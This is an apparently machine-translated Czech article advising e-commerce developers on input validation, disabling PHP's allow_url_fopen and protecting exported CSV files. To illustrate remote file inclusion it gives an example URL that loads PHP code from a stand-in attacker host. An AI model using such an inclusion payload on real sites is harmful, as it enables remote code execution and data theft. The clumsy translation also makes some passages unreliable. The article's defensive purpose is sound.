E-Commerce Security - Připojení bezpečnostní díry

Bezpečnost v e-commerce internetových stránkách musí být jedním z nejdůležitějších aspektů při rozvoji e-commerce webové stránky nebo software. Developer musí být vědomi všech bezpečnostních otázek při návrhu webu. S e-commerce stále běžnější v těchto dnech, počet útoků na zabezpečení, je jistě roste. Paranoia je zdravá věc, pro e-commerce site vývojáře, musíme držet krok k bráně s bezpečnostními problémy, a aby naše uši a oči otevřené. Ačkoli tyto mezery jsou závažné, pokud jsou přítomny tyto mezery jsou snadno opravit.

Níže jsou některé bezpečnostní aspekty, které mají být zahrnuty při vývoji webu. Tento článek se nevztahuje na e-krádeže v obchodech, prosím, viz můj samostatný článek o tomto.

Uživatelský vstup - každý vstup, ať již se zadáním množství, vyhledávání produktů, zadáním názvu, atd., musí být ověřena pro podezřelé osoby. Není-li to provést, je možné zadat "?>", uzavírací koncové značky PHP a spustit nějaký kód PHP.

Je mnohem bezpečnější povolit čísel a znaků az (včetně měst) a 0-9 a nic jiného, než vytvořit seznam všech znaků, které by neměly být. Validační skript musí procházet každý znak jeden po druhém. To je třeba dosáhnout s použitím při validaci na straně serveru, nikoliv Javascript. Použití na straně serveru ověřování vstupu je nezbytné, aby se nežádoucí znaky

Existuje další zásadní při provádění PHP kódu. Při použití PHP je nastavení tzv. allow_url_fopen, která umožňuje otevírání souborů z PHP skriptu. Toto nastavení by měly být vypnuty, není absolutně nezbytné.

Jen si představte, máte PHP skripty pro pevné záhlaví a zápatí, a přístup k vaší webové stránky, zadejte příkaz v http://www.mysite.com/index.php?page=page2. Stačí se uživatel se zlými úmysly spustit skript změnou těchto parametrů příkazem "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" s nějaký PHP kód v souboru "hacker.txt". Dalo by se něco stalo, PHP soubory číst, mazat, ukradl důležité informace.

Pokud si nejste jisti, zda je toto nastavení zapnout nebo vypnout, zkopírujte prosím následující PHP kód do textového souboru a nahrát ji na svůj webový server:

phpinfo ();
?>

Přejdete-li váš scénář na svůj webový server, měli byste narazit na nastavení allow_url_fopen v konfiguraci.

Uživatel počítače, může za normálních okolností, které nelze zjistit hodnotu tohoto nastavení.

Buďte opatrní vyvážených data jako příkazy, produkty ve formátu CSV soubory a mySQL. Je-li tato data se vyváží ze skript a je veden na webovém serveru pod společnou tj. název souboru. http://www.mysite.com/admin/output_tables.csv. To je jen opravdu problém, když vyvážené data uložena v souboru v adresáři, který je veřejně přístupný. K dispozici jsou dva způsoby, jak zabránit této bezpečnostní riziko - První výstupní soubor má za sebou adresář chráněný heslem, za druhé se data nacházejí uvnitř formuláře HTML textarea element na skript. Majitel obchodu pak zkopírovat informace z textového souboru a vytvořte nový soubor na svém počítači a vložte informace najdete zde.

Stačí hacker najít tento soubor kontrolou z e-commerce software demo internetové stránky a podívejte se stejným názvem na skutečném místě.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video Jak na Keep Your Computer Bezpečná	Play Video Jak Zkontrolujte nastavení zabezpečení v systému Windows Vista

Níže uvedené jsou více článků, související s výše uvedeným článkem z "Elektronický obchod" článek kategorie.

Zájemci v uvedeném článku "E-Commerce Security - Připojení bezpečnostní díry" jsou také zájem na související články uvedené níže: